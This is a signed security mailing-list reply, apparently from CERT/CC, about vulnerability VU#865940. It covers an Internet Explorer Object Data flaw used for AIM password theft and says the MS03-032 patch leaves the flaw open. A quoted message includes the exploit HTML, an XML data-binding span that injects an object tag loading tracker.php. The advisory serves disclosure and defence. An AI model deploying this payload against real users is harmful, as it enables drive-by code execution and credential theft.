RE: [Fwd: Re: AIM Password theft] VU#865940

["CERT(R) Coordination Center" <cert@xxxxxxxx>]

-----BEGIN PGP SIGNED MESSAGE-----

Thor Larholm <thor@xxxxxxxx> writes:

> This is just a simple exploit utilizing the Object Data vulnerability
> discovered by Drew Copley, coupled with the GreyMagic no-script HTML
> rendering as demonstrated earlier on this list and others by jelmer.
> 
> Tell your user to go install MS03-032, which he obviously did not do as
> MS03-032 patches this vulnerability. MS03-032 was released on August 20
> and you can find it at
> 
> http://www.microsoft.com/technet/security/bulletin/MS03-032.asp

At the present, the patch for MS03-032 breaks one of at least three
exploit techniques.  The patch does not resolve the vulnerability.
MS03-032 acknowledges this.  I have seen several examples of this
vulnerability being exploited in the wild.

> www.haxr.org contains the following HTML code (with <> replaced to []):
> 
> [span datasrc="#oExec" datafld="counter" dataformatas="html"][/span]
> [xml id="oExec"]
> [security]
> [counter]
> [![CDATA[
> [object data=tracker.php][/object]
> ]]]
> [/counter]
> [/security]
> [/xml]

In particular, the current MS03-32 patch doesn't account for an HTML
document created via XML/data binding:

  <http://greymagic.com/adv/gm001-ie/>

The patch also does not account for an HTML document created via
script:

  <http://www.securityfocus.com/archive/1/336616>

Vulnerability Note VU#865940:

  <http://www.kb.cert.org/vuls/id/865940>


Regards,

  - Art


             Art Manion  --  CERT Coordination Center
    <http://www.cert.org/>   <cert@xxxxxxxx>   +1 412-268-7090
         E0 1E DF F5 FC 76 00 32  77 8F 25 F7 B0 2E 2C 27


-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQCVAwUBP3HlHDpmH2w9K/0VAQGBuQQAmrvGlHEXmMx48LhA2dQ/wK8XCqYaVYtD
Y4FPmSvwqZ8phYKhT20Dh9sYGLWHbaJ3sfGA589MOLJwhpZ3aVlunLQ6GjLO1qje
6dab5rVGdgTNzMC87YX2E7RB6uS4K8htL0MhN4LLvbHS402QEeNOhX+Fi2lsLkyi
6uioMggI1Ms=
=Jnmk
-----END PGP SIGNATURE-----